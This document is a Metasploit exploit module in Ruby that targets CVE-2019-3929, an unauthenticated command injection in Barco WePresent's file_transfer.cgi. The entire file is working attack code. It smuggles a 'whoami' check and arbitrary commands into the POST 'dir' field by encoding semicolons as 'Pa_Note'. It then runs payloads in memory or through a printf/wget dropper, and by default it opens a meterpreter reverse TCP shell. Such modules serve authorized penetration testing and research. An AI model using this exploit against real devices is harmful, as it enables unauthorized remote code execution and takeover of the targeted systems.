metasploit-gs/modules/exploits/linux/http/wepresent_cmd_injection.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Barco WePresent file_transfer.cgi Command Injection",
      'Description'    => %q(
        This module exploits an unauthenticated remote command injection
        vulnerability found in Barco WePresent and related OEM'ed products.
        The vulnerability is triggered via an HTTP POST request to the
        file_transfer.cgi endpoint.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => 'Jacob Baines, @Junior_Baines',
      'References'     =>
        [
          ['CVE', '2019-3929'],
          ['EDB', '46786'],
          ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
        ],
      'DisclosureDate' => "Apr 30, 2019",
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'     => false,
      'Targets'        => [
        ['Unix In-Memory',
         'Platform'    => 'unix',
         'Arch'        => ARCH_CMD,
         'Type'        => :unix_memory,
         'Payload'     => {
           'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
         }],
        ['Linux Dropper',
         'Platform'        => 'linux',
         'Arch'            => ARCH_ARMLE,
         'CmdStagerFlavor' => ['printf', 'wget'],
         'Type'            => :linux_dropper]
      ],
      'DefaultTarget'  => 1,
      'DefaultOptions' => {
        'SSL'               => true,
        'RPORT'             => 443,
        'CMDSTAGER::FLAVOR' => 'printf',
        'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp'
      }))
  end

  def check
    check_resp = send_request_cgi(
      'uri'       => '/cgi-bin/file_transfer.cgi',
      'method'    => 'POST',
      'ssl'       => true,
      'port'      => rport,
      'data'      => "file_transfer=new&dir='Pa_NotewhoamiPa_Note'"
    )

    if check_resp && check_resp.code == 200
      check_resp.body.gsub!(/[\r\n]/, "")
      if check_resp.body == "root"
        return Exploit::CheckCode::Vulnerable
      end
    end

    return Exploit::CheckCode::Safe
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/;/, 'Pa_Note')
    cmd.gsub!(/\+/, 'Pa_Add')
    return cmd
  end

  def execute_command(cmd, _opts = {})
    send_request_cgi({
      'uri'       => '/cgi-bin/file_transfer.cgi',
      'method'    => 'POST',
      'ssl'       => true,
      'port'      => rport,
      'data'      => "file_transfer=new&dir='Pa_Note(#{filter_bad_chars(cmd)})Pa_Amp'"
    }, nil)
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(linemax: 128)
    end
  end
end